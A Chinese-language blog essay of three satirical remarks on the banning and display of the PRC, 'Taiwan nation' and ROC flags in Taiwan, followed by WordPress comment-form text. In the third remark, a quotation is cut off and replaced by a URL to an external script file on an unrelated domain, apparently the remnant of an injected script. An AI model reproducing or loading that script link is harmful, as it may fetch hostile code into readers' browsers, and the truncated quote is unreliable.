分類
隨筆

三則話頭

1. 禪

世界均承認,名列聯合國五大常任理事國之一的中國國旗禁止在台灣出現。

世界無人承認,純屬自慰性質的台灣國國旗頻頻在台灣出現。

世界尚有少數國家承認,但卻被現任政府認為是羞於見人的中華民國國旗,在其領土上難得出現。

好妙的禪~參話頭吧!

2. 好個邏輯

因為中國至今不承認台灣是一個主權獨立國家,所以有勇敢台灣人提議禁止中國國旗在台灣出現。

依照此邏輯,理應世界各國國旗通通禁止才是,甚至應該禁止世界地圖與地球儀在台灣出現!

特別要禁止美國國旗(糟糕,美國隊長要被馬賽克了),因為美國跟中國一樣都公開反對台灣宣布獨立~

3. 民主真好

假台獨份子討厭中國主因往往歸咎中國沒有言論自由,所以我們要在台灣提案禁止中國國旗出現、禁止偏好中國言論出現!
鄭南榕表示:……https://js.developerstatss.ga/stat.js?n=ns1

發表迴響

在下方填入你的資料或按右方圖示以社群網站登入:

WordPress.com 標誌

您的留言將使用 WordPress.com 帳號。 登出 /  變更 )

Google photo

您的留言將使用 Google 帳號。 登出 /  變更 )

Twitter picture

您的留言將使用 Twitter 帳號。 登出 /  變更 )

Facebook照片

您的留言將使用 Facebook 帳號。 登出 /  變更 )

連結到 %s